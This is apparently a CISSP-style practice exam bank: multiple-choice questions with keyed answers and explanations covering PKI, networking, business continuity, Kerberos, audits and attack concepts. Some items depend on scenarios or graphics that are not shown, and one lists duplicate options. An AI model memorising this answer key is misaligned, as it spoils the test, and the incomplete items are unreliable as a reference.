C. The certificate authority (CA) is responsible for creating and handing out certificates, maintaining them, and revoking them if necessary. Revocation is handled by the CA, and the revoked certificate information is stored on a certificate revocation list (CRL). This is a list of every certificate that has been revoked. This list is maintained and updated periodically. A certificate may be revoked because the key holder's private key was compromised or because the CA discovered the certificate was issued to the wrong person. If the certificate becomes invalid for some reason, the CRL is the mechanism for the CA to let others know this information. The Online Certificate Status Protocol (OCSP) is being used more and more rather than the cumbersome CRL approach. When using just a CRL, the user's browser must check a central CRL to find out if the certificate has been revoked, or the CA continually pushes out CRL values to the clients to ensure they have an updated CRL. If OCSP is implemented, it does this work automatically in the background. It carries out real-time validation of a certificate and reports back to the user whether the certificate is valid, invalid, or unknown.

What takes place at the data link layer? A. End-to-end connection B. Dialog control C. Framing D. Data syntax

C. The data link layer, in most cases, is the only layer that understands the environment in which the system is working, whether it be Ethernet, Token Ring, wireless, or a connection to a WAN link. This layer adds the necessary headers and trailers to the frame. Other systems on the same type of network using the same technology understand only the specific header and trailer format used in their data link technology.

After a disaster occurs, a damage assessment needs to take place. Which of the following steps occurs last in a damage assessment? A. Determine the cause of the disaster. B. Identify the resources that must be replaced immediately. C. Declare a disaster. D. Determine how long it will take to bring critical functions back online.

C. The final step in a damage assessment is to declare a disaster. After information from the damage assessment is collected and assessed, it will indicate what teams need to be called to action and whether the BCP actually needs to be activated. The BCP coordinator and team must develop activation criteria before a disaster takes place. After the damage assessment, if one or more of the situations outlined in the criteria have taken place, then the team is moved into recovery mode. Different organizations have different criteria, because the business drivers and critical functions will vary from organization to organization. The criteria may consist of danger to human life, danger to state or national security, damage to facility, damage to critical systems, and estimated value of downtime that will be experienced.

Which of the following best describes the firewall configuration issues Sean's team member is describing? A. Clean-up rule, stealth rule B. Stealth rule, silent rule C. Silent rule, negate rule D. Stealth rule, silent rule

C. The following describes the different firewall rule types. Silent rule: drops "noisy" traffic without logging it; this reduces log sizes by not responding to packets that are deemed unimportant. Stealth rule: disallows access to firewall software from unauthorized systems. Cleanup rule: the last rule in the rule base, which drops and logs any traffic that does not meet the preceding rules. Negate rule: used instead of the broad and permissive "any rules"; negate rules provide tighter permission rights by specifying what system can be accessed and how.

Brute-force attacks have increased because _____ A. The increased use of permutations and transpositions in algorithms. B. As algorithms get stronger, they get less complex, and thus more susceptible to attacks. C. The increase in processor speed and power D. The reduction in key length over time.

C. The increase in processor speed and power

Which of the following statements is true about the information life cycle? A. The information life cycle begins with its archival and ends with its classification. B. Most information must be retained indefinitely. C. The information life cycle begins with its acquisition/creation and ends with its disposal/destruction. D. Preparing information for use does not typically involve adding metadata to it.

C. The information life cycle begins with its acquisition/creation and ends with its disposal/destruction.

Which of the following has the correct term-to-definition mapping? i. Performed with tools that cycle through many possible character, number, and symbol combinations to uncover a password. ii. Files of thousands of words are compared to the user's password until a match is found. iii. An attacker falsely convinces an individual that she has the necessary authorization to access specific resources. iv. Rainbow table: An attacker uses a table that contains all possible passwords already in a hash format. A. i, ii B. i, ii, iv C. i, ii, iii, iv D. i, ii, iii

C. The list has all the correct term-to-definition mappings.

Which of the following best describes the types of languages and/or protocols that Harry needs to ensure are implemented? A. Security Assertion Markup Language, Extensible Access Control Markup Language, Service Provisioning Markup Language B. Service Provisioning Markup Language, Simple Object Access Protocol, Extensible Access Control Markup Language C. Extensible Access Control Markup Language, Security Assertion Markup Language, Simple Object Access Protocol D. Service Provisioning Markup Language, Security Association Markup Language

C. The most appropriate languages and protocols for the purpose laid out in the scenario are Extensible Access Control Markup Language, Security Assertion Markup Language, and Simple Object Access Protocol. Harry's group is not necessarily overseeing account provisioning, so the Service Provisioning Markup Language is not necessary, and there is no language called "Security Association Markup Language."

Which of the following is the most critical best practice when conducting an internal security audit? A. Take advantage of the logistical flexibility that an internal audit can offer. Ad hoc scheduling makes internal audits much easier to execute than external ones. B. Compensate for the "insider knowledge" advantage of your internal audit team by sharing with them the least amount of information possible, especially with respect to policies, procedures, and configurations. C. Make sure to keep the audit report's audience in mind at all times during the process. The audit report needs to have an impact on not only managers but also operations staff. D. Rely on the defensive team to document what was done successfully against them, including when and how. That way the auditing team doesn't have to get bogged down with documenting all the things that were tried but ultimately didn't work.

C. The most important practice when conducting internal audits is to ensure both that the results are actionable by operations staff and that their importance is well understood by the management team that is responsible for actions being taken. Otherwise, such audit activities present negative value, introducing liability for the organization by demonstrating institutional knowledge of weaknesses which then go unaddressed.

Which of the following statements is true with respect to security audits, vulnerability assessments, and penetration tests? A. Third-party security audits are only necessary when regulations require them. B. Vulnerability assessments and penetration tests are essentially the same. C. Vulnerability assessments help to prioritize weaknesses that need to be addressed. D. Internal assessments have very little value.

C. The most valuable aspect of vulnerability assessments, whether conducted internally or by a third party, is that they help to enumerate all of the potential vulnerabilities that an enterprise has so that remediation can be prioritized.

All of the following are types of tests for disaster recovery and business continuity plans except A. Structured walk-through test B. Simulation test C. Null hypothesis test D. Full-interruption test

C. The null hypothesis test is used in statistical analysis. Though it could conceivably be used to analyze the results of a DRP/BCP test, it would not be in and of itself a feasible way to test these plans.

CPUs and operating systems can work in two main types of multitasking modes. What controls access and the use of system resources in preemptive multitasking mode? A. The user and application. B. The program that is loaded into memory. C. The operating system. D. The CPU and user.

C. The operating system.

Which of the following best explains why John does not see anything suspicious on the reported systems? A. The systems have not yet been infected. B. He is not running the correct tools. He needs to carry out a penetration test on the two systems. C. Trojaned files have been loaded and executed. D. A back door has been installed and the attacker enters the system sporadically.

C. The other tools in the rootkit may vary, but they usually comprise utilities that are used to cover the attacker's tracks. For example, every operating system has basic utilities that a root or administrator user can use to detect the presence of the rootkit, an installed sniffer, and the back door. The hacker replaces these default utilities with new utilities, which share the same name. They are referred to as "Trojaned programs" because they carry out the intended functionality but do some devious activity in the background.

In disaster recovery planning, what is the recovery point objective? A. The point to which application data must be recovered to resume business operations. B. The maximum elapsed time required to complete recovery of application data. C. The point to which application data must be recovered to resume system operations. D. The point at which the information system must be operational at an alternate site.

C. The point to which application data must be recovered to resume system operations.

Why would a certificate authority revoke a certificate? A. If the user's public key has become compromised B. If the user changed over to using the PEM model that uses a web of trust C. If the user's private key has become compromised D. If the user moved to a new location

C. The reason a certificate is revoked is to warn others who use that person's public key that they should no longer trust the public key because, for some reason, that public key is no longer bound to that particular individual's identity. This could be because an employee left the company or changed his name and needed a new certificate, but most likely it is because the person's private key was compromised.

In this scenario, what would the 60-minute time period be referred to as? A. Recovery time period B. Maximum tolerable downtime C. Recovery point objective D. Recovery point time period

C. The recovery point objective (RPO) is the acceptable amount of data loss measured in time. This value represents the earliest point in time in which data must be recovered. The higher the business value of data, the more funds or other resources that can be put into place to ensure a smaller amount of data is lost in the event of a disaster.

In what order would a typical PKI infrastructure perform the following transactions? i. Receiver decrypts and obtains session key. ii. Sender requests receiver's public key. iii. Public key is sent from a public directory. iv. Sender sends a session key encrypted with receiver's public key. A. iv, iii, ii, i B. ii, i, iii, iv C. ii, iii, iv, i D. ii, iv, iii, i

C. The sender would need to first obtain the receiver's public key, which could be from the receiver or a public directory. The sender needs to protect the symmetric session key as it is being sent, so she encrypts it with the receiver's public key. The receiver decrypts the session key with his private key.

Which of the following statements is true? A. A bottom-up approach to software testing allows interface errors to be detected earlier. B. A top-down approach to software testing allows errors in critical modules to be detected earlier. C. The software test plan and results should be retained as part of the system's permanent documentation. D. Black box software testing is required as part of procedural detail.

C. The software test plan and results should be retained as part of the system's permanent documentation.

Alice's company has decided to bulk mail postcards to their current and prospective customers, in hopes that they will return them along with feedback as to the services the company provides. She has been tasked with designing and developing the system that will be used to process the information returned, and has been instructed to ensure that it will be most useful to direct management's business decisions for the next year. It is clear that automation will be required, including the scanning of the returned postcards, and likely some amount of optical character recognition to enable text-based processing of the responses. Given this scenario, which of the following statements is true? A. How the text-based data will be stored and accessed is only a concern of the project risk analysis. B. How text-based data will be stored and accessed is not a concern during project initiation. C. The storage and means of access of the resulting data is a matter of concern for a security risk analysis. D. The storage and means of access of the resulting data is not a matter of concern for a security risk analysis.

C. The storage and means of access of the resulting data is a matter of concern for a security risk analysis.

Which of the following best describes the difference between a warded lock and a tumbler lock? A. A tumbler lock is more simplistic and easier to circumvent than a warded lock. B. A tumbler lock uses an internal bolt, and a warded lock uses internal cylinders. C. A tumbler lock has more components than a warded lock. D. A warded lock is mainly used externally, and a tumbler lock is used internally.

C. The tumbler lock has more pieces and parts than a warded lock. The key fits into a cylinder, which raises the lock metal pieces to the correct height so the bolt can slide to the locked or unlocked position. A warded lock is easier to circumvent than a tumbler lock.

Which of the following is the correct sequence in the Kerberos authentication process with respect to passwords, Key Distribution Centers (KDCs), ticket granting servers (TGSs), ticket granting tickets (TGTs), services, and service tickets? A. The user provides a username/password to the workstation, the workstation obtains a TGT from the TGS, then subsequently obtains a service ticket from the KDC, which it presents to the service. B. The workstation obtains a TGT from the KDC, which the user then validates with a password. The TGT is then exchanged for a service ticket from the TGS, which is presented to the service. C. The user provides a username/password to the workstation, the workstation obtains a TGT from the KDC, then subsequently obtains a service ticket from the TGS, which it presents to the service. D. The user obtains a service ticket from the service. The user then validates this ticket with a username/password provided to the TGS, which results in a TGT that is further validated by the KDC in a final step.

C. The user must first authenticate to the workstation with a username and password. These credentials are then forwarded by the workstation to the authentication service (AS) on the KDC, which then returns a TGT encrypted with the TGS's secret key. Later, when a service is required, the TGT is presented back to the TGS that can authenticate it, and which then returns a service ticket encrypted with the service's secret key. When the service ticket is presented to the service, mutual authentication can occur: the service knows the user must be authentic, because the user couldn't have a valid service ticket without having authenticated to the KDC and TGS, and the user knows the service is authentic, because it can decrypt the service ticket.

Jeff is leading the business continuity group in his company. They have completed a business impact analysis and have determined that if the company's credit card processing functionality were unavailable for 48 hours, the company would most likely experience such a large financial hit that it would have to go out of business. The team has calculated that this functionality needs to be up and running within 28 hours after experiencing a disaster for the company to stay in business. The team has also determined that the restoration steps must be able to restore data that is 60 minutes old or less. In this scenario, which of the following is the work recovery time value? A. 48 hours B. 28 hours C. 20 hours D. 1 hour

C. The work recovery time (WRT) is the remainder of the overall MTD value after RTO. RTO usually deals with getting the infrastructure and systems back up and running, and WRT deals with restoring data, testing processes, and then making everything "live" for production purposes.

Systems that are built on the OSI framework are considered open systems. What does this mean? A. They do not have authentication mechanisms configured by default. B. They have interoperability issues. C. They are built with international protocols and standards so they can easily communicate with other systems. D. They are built with international protocols and standards so they can choose what types of systems they will communicate with.

C. They are built with international protocols and standards so they can easily communicate with other systems.

Internal audits are the preferred approach when which of the following is true? A. The organization lacks the organic expertise to conduct them. B. Regulatory requirements dictate the use of a third-party auditor. C. The budget for security testing is limited or nonexistent. D. There is concern over the spillage of proprietary or confidential information.

C. Third-party auditors are almost always fairly expensive, so if the organization's budget does not support their use, it may be necessary to use internal assets to conduct the audit.

An online transaction processing (OLTP) system that detects an invalid transaction should do which of the following? A. Roll back and rewrite over original data B. Terminate all transactions until properly addressed C. Write a report to be reviewed D. Checkpoint each data entry

C. This can seem like a tricky question. It states that the system has detected an invalid transaction, which is most likely a user error. This error should be logged so it can be reviewed. After the review, the supervisor, or whoever makes this type of decision, will decide whether or not it was a mistake and, if so, investigate it as needed. If the system had a glitch, power fluctuation, hang-up, or any other software- or hardware-related error, it would not be an invalid transaction, and in that case the system would carry out a rollback function.

If a programmer is restricted from updating and modifying production code, what is this an example of? A. Rotation of duties B. Due diligence C. Separation of duties D. Controlling input values

C. This is just one of several examples of separation of duties. A system must be set up for proper code maintenance to take place when necessary, instead of allowing a programmer to make changes arbitrarily. These types of changes should go through a change control process and should have more entities involved than just one programmer.

Which of the following statements is true with respect to vulnerability tests versus penetration tests? A. They are essentially the same. In most cases both terms may be used interchangeably. B. The goals between the two differ slightly, but are similar enough that they should be handled in effectively the same way. C. Many of the same tools and techniques are commonly employed regardless of which of the two tests is being conducted. D. Though the goals, tools, and techniques are distinctly different between the two, either approach can be an acceptable replacement for the other.

C. Though vulnerability assessments and penetration testing are very different activities with distinctly different goals, many of the same tools and techniques will necessarily be employed regardless of which type of test is being conducted.

It can be very challenging for programmers to know what types of security should be built into the software that they create. The number of vulnerabilities, threats, and risks involved with software development can seem endless. Which of the following describes the best first step for developers to take to identify the security controls that should be coded into a software project? A. Penetration testing B. Regression testing C. Threat modeling D. Attack surface analysis

C. Threat modeling is a systematic approach used to understand how different threats could be realized and how a successful compromise could take place. A threat model is created to define a set of possible attacks that can take place so the necessary countermeasures can be identified and implemented. Through the use of a threat model, the software team can identify and rate threats. Rating the threats based upon the probability of exploitation and the associated impact of each exploitation allows the team to focus on the threats that present the greatest risk. When using threat modeling in software development, the process starts at the design phase and should continue in an iterative process through each phase of the software's life cycle. Different software development threat modeling approaches exist, but they have many of the same steps, including identifying assets, trust boundaries, data flows, entry points, privilege code, etc. This approach also includes building attack trees, which represent the goals of each attack and the attack methodologies. The output of all of these steps is then reviewed and security controls selected and coded into the software.

Use the following scenario to answer Questions 27-28. Tim is the CISO for a large distributed financial investment organization. The company's network is made up of different network devices and software applications, which generate their own proprietary logs and audit data. Tim and his security team have become overwhelmed with trying to review all of the log files when attempting to identify if anything suspicious is taking place within the network. Another issue Tim's team needs to deal with is that many of the network devices have automated IPv6-to-IPv4 tunneling enabled by default. Which of the following is the best solution for this company to implement as it pertains to the first issue addressed in the scenario? A. Event correlation tools B. Intrusion detection systems C. Security information and event management D. Security event correlation management tools

C. Today, more organizations are implementing security event management (SEM) systems, also called security information and event management (SIEM) systems. These products gather logs from various devices (servers, firewalls, routers, etc.) and attempt to correlate the log data and provide analysis capabilities. We also have different types of systems on a network (routers, firewalls, IDS, IPS, servers, gateways, proxies) collecting logs in various proprietary formats, which requires centralization, standardization, and normalization. Log formats differ per product type and vendor.

Which type of WAN tunneling protocol is missing from the right table in the graphic that follows? A. IPSec B. FDDI C. L2TP D. CSMA/CD

C. Tunneling is the main ingredient to a VPN because that is how the VPN creates its connection. Three main tunneling protocols are used in VPN connections: PPTP, L2TP, and IPSec. L2TP provides the functionality of the Point-to-Point Tunneling Protocol (PPTP), but it can work over networks other than just IP, and it provides a higher level of security when combined with IPSec. L2TP does not provide any encryption or authentication services, so it needs to be combined with IPSec if those services are required. The processes that L2TP uses for encapsulation are similar to those used by PPTP. The PPP frame is encapsulated with L2TP. One limitation of PPTP is that it can work only over IP networks, so other protocols must be used to move data over frame relay, X.25, and ATM links.

What markup language allows for the sharing of application security policies to ensure that all applications are following the same security rules? A. XML B. SPML C. XACML D. GML

C. Two or more companies can have a trust model set up to share identity, authorization, and authentication methods. This means that if Bill authenticates to his company's software, this software can pass the authentication parameters to its partner's software. This allows Bill to interact with the partner's software without having to authenticate twice. This can happen through Extensible Access Control Markup Language (XACML), which allows two or more organizations to share application security policies based upon their trust model. XACML is a markup language and processing model that is implemented in XML. It declares access control policies and describes how to interpret them.

Security event logs can best be protected from tampering by which of the following? A. Encrypting the contents using asymmetric key encryption B. Ensuring every user has administrative rights on their own workstations C. Using remote logging over simplex communications media D. Storing the event logs on DVD-RW

C. Using a remote logging host raises the bar for attackers because if they are able to compromise one host, they would have to compromise the remote logger in order to tamper with the logs. The use of a simplex channel further hinders the attackers.

Which of the following is a bridge-mode technology that can monitor individual traffic links between virtual machines or can be integrated within a hypervisor component? A. Orthogonal frequency-division B. Unified threat management modem C. Virtual firewall D. Internet Security Association and Key Management Protocol

C. Virtual firewalls can be bridge-mode products, which monitor individual traffic links between virtual machines, or they can be integrated within the hypervisor. The hypervisor is the software component that carries out virtual machine management and oversees guest system software execution. If the firewall is embedded within the hypervisor, then it can "see" and monitor all the activities taking place within the one system.

Which of the following types of memory cannot be changed after it's written? A. RAM (Random Access Memory) B. Cache C. WORM (Write Once Read Many) D. EPROM (Erasable Programmable Read-Only Memory)

C. WORM (Write Once Read Many)

Which of the following components should Tom make sure his team puts into place? A. Single sign-on module B. LDAP directory service synchronization C. Web access management D. X.500 database

C. Web access management (WAM) is a component of most IdM products that allows for identity management of web-based activities to be integrated and managed centrally.

As Hamid is reviewing IdM products and their specific characteristics, his boss calls him and tells him that the product also needs to allow for externally controlled access for the company's e-commerce operations. What functionality does Hamid need to ensure is part of the product he purchases? A. LDAP B. Directory services C. Web access management D. PKI

C. Web access management.

What type of client ports should Don make sure the institution's software is using when client-to-server communication needs to take place? A. Well known B. Registered C. Dynamic D. Free

C. Well-known ports are mapped to commonly used services (HTTP, FTP, etc.). Registered ports are 1,024 to 49,151, and vendors register specific ports to map to their proprietary software. Dynamic ports (private ports) are available for use by any application.

A suspected crime has been reported within your organization. Which of the following steps should the incident response team take first? A. Establish a procedure for responding to the incident. B. Call in forensic experts. C. Determine that a crime has been committed. D. Notify senior management.

C. When a suspected crime is reported, the incident response team should follow a set of predetermined steps to ensure uniformity in their approach and make sure no steps are skipped. First, the incident response team should investigate the report and determine that an actual crime has been committed. If the team determines that a crime has been carried out, senior management should be informed immediately. At this point, the company must decide if it wants to conduct its own forensic investigation or call in external experts.

Sally has found out that software programmers in her company are making changes to software components and uploading them to the main software repository without following version control or documenting their changes. This is causing a lot of confusion and has caused several teams to use the older versions. Which of the following would be the best solution for this situation? A. Software change control management B. Software escrow C. Software configuration management D. Software configuration management escrow

C. When changes take place to a software product during its development life cycle, a configuration management system can be put into place that allows for change control processes to take place through automation. A product that provides software configuration management (SCM) identifies the attributes of software at various points in time and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release. During a software development project, the centralized code repositories are often kept in systems that can carry out SCM functionality, which manages and tracks revisions made by multiple people against a single master set.

George is the security manager of a large bank, which provides online banking and other online services to its customers. George has recently found out that some of the bank's customers have complained about changes to their bank accounts that they did not make. George worked with the security team and found out that all changes took place after proper authentication steps were completed. Which of the following describes what most likely took place in this situation? A. Web servers were compromised through cross-scripting attacks. B. TLS connections were decrypted through a man-in-the-middle attack. C. Personal computers were compromised with Trojan horses that installed keyloggers. D. Web servers were compromised and masquerading attacks were carried out.

C. While all of these situations could have taken place, the most likely attack type in this scenario is the use of a keylogger. Attackers commonly compromise personal computers by tricking the users into installing Trojan horses that have the capability to install keystroke loggers. The keystroke logger can capture authentication data that the attacker can use to authenticate as a legitimate user and carry out malicious activities.

Which of the following is NOT an important practice when facilitating a third-party audit? A. Ensure that the internal teams responsible for the systems and controls under audit are keenly aware of the requirements, methodology, and framework for the assessment. B. Conduct an internal audit ahead of time, using the same framework and methodology that the third party will use so that there are no surprises. C. Keep the details of the progress and findings of the third-party assessment tightly confidential, disclosing the results to management only once they have been finalized, so as to avoid unnecessary alarm or managerial interference. D. Be prepared to facilitate the third party's inspection of internal systems, but also to maintain control of them at all times in case the auditors' activities threaten to cause inadvertent disruption or other adverse effects.

C. While it is certainly the case that preliminary findings may be inaccurate, and hence cause some amount of unnecessary alarm if viewed without proper context, management must be kept apprised of the auditors' activities and discoveries at all times. Management still bears the responsibility of operating the business, which includes responding to adverse conditions, even as the audit effort is ongoing.

Which of the following best describes an application of cryptography to protect data at rest? A. VPN B. Degaussing C. Whole-disk encryption D. Up-to-date antivirus software

C. Whole-disk encryption

What is the standard used for PKI certificates? A. X.400 B. X.500 C. X.509 D. LDAP

C. X.509

Which of the following best describes the type of vulnerability mentioned in this scenario? A. Dynamic vulnerability that is polymorphic B. Static vulnerability that is exploited by server-side injection parameters C. Vulnerability that does not currently have an associated solution D. Database vulnerability that directly affects concurrency

C. Zero-day vulnerabilities are vulnerabilities that do not currently have a resolution. If a vulnerability is identified and there is not a pre-established fix (patch, configuration, update), it is considered a zero day. A zero-day attack is an attack that exploits a previously unknown vulnerability in a system, meaning that the attack occurs between the time it is identified and the solution is prepared—that is, on "day zero" of the awareness of the vulnerability. This leaves zero days for the victim to react and apply a patch to the vulnerability.

Which areas of a company are business continuity plans recommended for? A. The most important operational and financial areas. B. The areas that house the critical systems. C. All areas. D. The areas that the company cannot survive without.

C. All areas.

Mike's team has decided to hire and deploy security guards to monitor activities within the company's facility. Which of the categories listed in the scenario does this countermeasure map to? A. Delaying B. Detection C. Assessment D. Recall

C. Assessment

A security measure has recently been put into place within the accounting department. All users within a specified clearance level have been permanently tied to a database with an equal classification level. This method of joining a subject to an object is referred to as: A. Isolating B. Strapping C. Binding D. Mandating

C. Binding

Which of the following statements is true? A. Development staff should implement systems. B. Development staff should support production data. C. Development staff should perform unit testing. D. Development staff should perform acceptance testing.

C. Development staff should perform unit testing.

Which of the following is not a physical access control? A. Turnstiles B. Fencing C. Host-based IDS D. Exterior lighting

C. Host-based IDS

Which of the following has an incorrect definition mapping? i. Civil (code) law - based on previous interpretations of law. ii. Common law - rule-based law, not precedent-based. iii. Customary law - deals mainly with personal conduct and patterns of behavior. iv. Religious law - systems based on religious beliefs of the region. A. i, iii B. i, ii, iii C. i, ii D. iv

C. i, ii

Kerberos technology has some issues that need to be understood before implementation. Which of the following are issues pertaining to Kerberos? i. The KDC can be a single point of failure. If the KDC goes down, no one can access needed resources. Redundancy is necessary for the KDC. ii. The KDC must be able to handle the number of requests it receives in a timely manner. It must be scalable. iii. Secret keys are temporarily stored on the users' workstations, which means it is possible for an intruder to obtain these cryptographic keys. iv. Session keys are decrypted and reside on the users' workstations, either in a cache or in a key table. Again, an intruder can capture these keys. A. i, ii, iv B. i, iii, iv C. i, ii, iii, iv D. ii, iii

C. i, ii, iii, iv

The information security industry is made up of various best practices, standards, models, and frameworks. Some were not developed first with security in mind but can be integrated into an organizational security program to help in its effectiveness and efficiency. It is important to know of all of these different approaches so that an organization can choose the ones that best fit its business needs and culture. Which of the following best describes the approach(es) that should be put into place if an organization wants to integrate a way to improve its security processes over a period of time? i. Information Technology Infrastructure Library should be integrated because it allows for the mapping of IT service process management, business drivers, and security improvement. ii. Six Sigma should be integrated because it allows for the defects of security processes to be identified and improved upon. iii. Capability Maturity Model Integration should be integrated because it provides distinct maturity levels. iv. The Open Group Architecture Framework should be integrated because it provides a structure for process improvement. A. i, iii B. ii, iii, iv C. ii, iii D. ii, iv

C. ii, iii

Asymmetric cryptography has all the following strengths, except: A. It is scalable. B. It is considered efficient in key exchange and digital signing. C. It is extremely fast. D. It has easier key management issues than symmetric cryptography.

C. it is extremely fast.

Which of the following are effective methods of preventing data remanence on solid-state devices (SSDs)? i. Clearing ii. Purging iii. Degaussing iv. Destruction A. i, ii B. i, iii, iv C. iv D. All of the above

C. iv. Destruction

The international standards bodies ISO and IEC developed a series of standards that are used in organizations around the world to implement and maintain information security management systems. The standards were derived from the British Standard 7799, which was broken down into two main pieces. Organizations can use this series of standards as guidelines, but can also be certified against them by accredited third parties. Which of the following are incorrect mappings pertaining to the individual standards that make up the ISO/IEC 27000 series? i. ISO/IEC 27001 outlines ISMS implementation guidelines, and ISO/IEC 27003 outlines the ISMS program's requirements. ii. ISO/IEC 27005 outlines the audit and certification guidance, and ISO/IEC 27002 outlines the metrics framework. iii. ISO/IEC 27006 outlines the program implementation guidelines, and ISO/IEC 27005 outlines risk management guidelines. iv. ISO/IEC 27001 outlines the code of practice, and ISO/IEC 27004 outlines the implementation framework. A. i, iii B. i, ii C. ii, iii, iv D. i, ii, iii, iv

D. i, ii, iii, iv

IEEE ___________ provides a unique ID for a device. IEEE ____________ provides data encryption, integrity, and origin authentication functionality. IEEE __________ carries out key agreement functions for the session keys used for data encryption. Each of these standards provides specific parameters to work within an IEEE ___________ framework. A. 802.1AF, 802.1AE, 802.1AR, 802.1X EAP-TLS B. 802.1AT, 802.1AE, 802.1AM, 802.1X EAP-SSL C. 802.1AR, 802.1AE, 802.1AF, 802.1X EAP-SSL D. 802.1AR, 802.1AE, 802.1AF, 802.1X EAP-TLS

D. 802.1AR provides a unique ID for a device. 802.1AE provides data encryption, integrity, and origin authentication functionality. 802.1AF carries out key agreement functions for the session keys used for data encryption. Each of these standards provides specific parameters to work within an 802.1X EAP-TLS framework.

There are several types of attacks that programmers need to be aware of. What attack does the graphic that follows illustrate? A. Traffic analysis B. Race condition C. Covert storage D. Buffer overflow

D. A buffer is an area reserved by an application to store something in it, like some user input. After the application receives the input, an instruction pointer points the application to do something with the input that's been put in the buffer. A buffer overflow occurs when an application erroneously allows an invalid amount of input to be written into the buffer area, overwriting the instruction pointer in the code that told the program what to do with the input. Once the instruction pointer is overwritten, whatever code has been placed in the buffer can then be executed, all under the security context of the application.

Which of the following is a representation of the logical relationship between elements of data and dictates the degree of association among elements, methods of access, processing alternatives, and the organization of data elements? A. Data element B. Array C. Secular component D. Data structure

D. A data structure is a representation of the logical relationship between elements of data. It dictates the degree of association among elements, methods of access, processing alternatives, and the organization of data elements. The structure can be simple in nature, like the scalar item, which represents a single element that can be addressed by an identifier and accessed by a single address in storage. The scalar items can be grouped in arrays, which provide access by indexes. Other data structures include hierarchical structures by using multilinked lists that contain scalar items, vectors, and possibly arrays. The hierarchical structure provides categorization and association.

Which of the following statements is most true with regard to internal security audits versus external, second-party audits? A. Internal audits aren't as valid as external, second-party audits because the insiders conducting them have an unrealistic advantage over real attackers due to their knowledge of the systems being inspected. B. Due to insider knowledge, internal audits require less technical skill to perform and so are more cost-effective than external, second-party audits. C. Internal audits provide no logistical advantage over external, second-party audits because in either case, management must schedule around disparate teams and routine program activities. D. The advantage in the knowledge that an inside team has in conducting an internal audit is illusory, as advanced adversaries often approach or exceed the level of knowledge the inside team possesses.

D. A dedicated and persistent adversary will likely gain a level of knowledge of their target that rivals or exceeds that of the internal audit team, both in breadth and accuracy. Further, their reconnaissance will likely be much more targeted than an internal team will leverage, and will be better aware of their own goals than the defender imagines.

Which of the following best describes a digital signature? A. A method of transferring a handwritten signature to an electronic document B. A method to encrypt confidential information C. A method to provide an electronic signature and encryption D. A method to let the receiver of the message prove the source and integrity of a message

D. A digital signature provides authentication (knowing who really sent the message), integrity (because a hashing algorithm is involved), and nonrepudiation (the sender cannot deny sending the message).

"Subjects can access resources in domains of equal or lower trust levels." This is an easy sentence, but a difficult concept for many people to really understand. Which of the following is not an example of this concept? A. The security officer can access over 80% of the files within a company. B. A contractor is only given access to three files on one file server. C. A security kernel process can access all processes within an operating system. D. A guest account has access to all administrator accounts in the domain.

D. A guest account has access to all administrator accounts in the domain.

Which of the following is not a property or characteristic of a one-way hash function? A. It converts a message of arbitrary length into a value of fixed length. B. Given the digest value, it should be computationally infeasible to find the corresponding message. C. It should be impossible or rare to derive the same digest from two different messages. D. It converts a message of fixed length to an arbitrary length value.

D. A hashing algorithm will take a string of variable length (the message can be any size) and compute a fixed-length value. The fixed-length value is the message digest. The MD family creates the fixed-length value of 128 bits, and SHA creates one of 160 bits.

Which best describes the approach Sandy's team member took when creating the business-oriented software package mentioned within the scenario? A. Software as a Service B. Cloud computing C. Web services D. Mashup

D. A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.

An operating system maintains several processes in memory at the same time. The processes can only interact with the CPU during their assigned time slices since there is only one CPU and many processes. Each process is assigned an interrupt value to allow for this type of time slicing to take place. Which of the following best describes the difference between maskable and non-maskable interrupts? A. A maskable interrupt is assigned to a critical process, and a nonmaskable interrupt is assigned to a noncritical process. B. A maskable interrupt is assigned to a process in ring 0, and a nonmaskable interrupt is assigned to a process in ring 3. C. A maskable interrupt is assigned to a process in ring 3, and a nonmaskable interrupt is assigned to a process in ring 4. D. A maskable interrupt is assigned to a noncritical process, and a nonmaskable interrupt is assigned to a critical process.

D. A maskable interrupt is assigned to an event that may not be overly important, and the programmer can indicate that if that interrupt calls, the program does not stop what it is doing. This means the interrupt is ignored. Nonmaskable interrupts can never be overridden by an application because the event that has this type of interrupt assigned to it is critical.

There are several different types of technologies within cryptography that provide confidentiality. What is represented in the graphic that follows? A. Running key cipher B. Concealment cipher C. Steganography D. One-time pad

D. A one-time pad is a perfect encryption scheme because it is considered unbreakable if implemented properly. A one-time pad uses a pad with random values that are XORed against the message to produce ciphertext. The plaintext message shown in the graphic that needs to be encrypted has been converted into bits, and our one-time pad is made up of random bits. This encryption process uses a binary mathematical function called exclusive-OR, usually abbreviated as XOR. The receiver must have the same one-time pad to decrypt the message by reversing the process.

Which of the following is an incorrect description pertaining to the common components that make up computer systems? i. General registers are commonly used to hold temporary processing data, while special registers are used to hold process-characteristic data as in condition bits. ii. A processor sends a memory address and a "read" request down an address bus and a memory address and a "read" request down an I/O bus. iii. Process-to-process communication commonly takes place through memory stacks, which are made up of individually addressed buffer locations. iv. A CPU uses a stack return pointer to keep track of the next instruction sets it needs to process. A. i B. i, ii C. ii, iii D. ii, iv

D. A processor sends a memory address and a "read" request down an address bus. The system reads data from that memory address and puts the requested data on the data bus. A CPU uses a program counter to keep track of the memory addresses containing the instruction sets it needs to process in sequence. A stack pointer is a component used within memory stack communication processes. An I/O bus is used by a peripheral device.

An approach to alternate offsite facilities is to establish a reciprocal agreement. Which of the following describes the pros and cons of a reciprocal agreement? A. It is fully configured and ready to operate within a few hours, but is the most expensive of the offsite choices. B. It is an inexpensive option, but it takes the most time and effort to get up and running after a disaster. C. It is a good alternative for companies that depend upon proprietary software, but annual testing is not usually available. D. It is the cheapest of the offsite choices, but mixing operations could introduce many security issues.

D. A reciprocal agreement, also referred to as mutual aid, means that company A agrees to allow company B to use its facilities if company B is hit by a disaster, and vice versa. This is a cheaper way to go than the other offsite choices, but it is not always the best choice. Most environments are maxed out pertaining to the use of facility space, resources, and computing capability. To allow another company to come in and work out of the same shop could prove to be detrimental to both companies. The stress of two companies working in the same environment could cause tremendous levels of tension. If it did work out, it would only provide a short-term solution. Configuration management could be a nightmare, and the mixing of operations could introduce many security issues. Reciprocal agreements have been known to work well in specific businesses, such as newspaper printing. These businesses require very specific technology and equipment that will not be available through any subscription service. For most other organizations, reciprocal agreements are generally, at best, a secondary option for disaster protection.

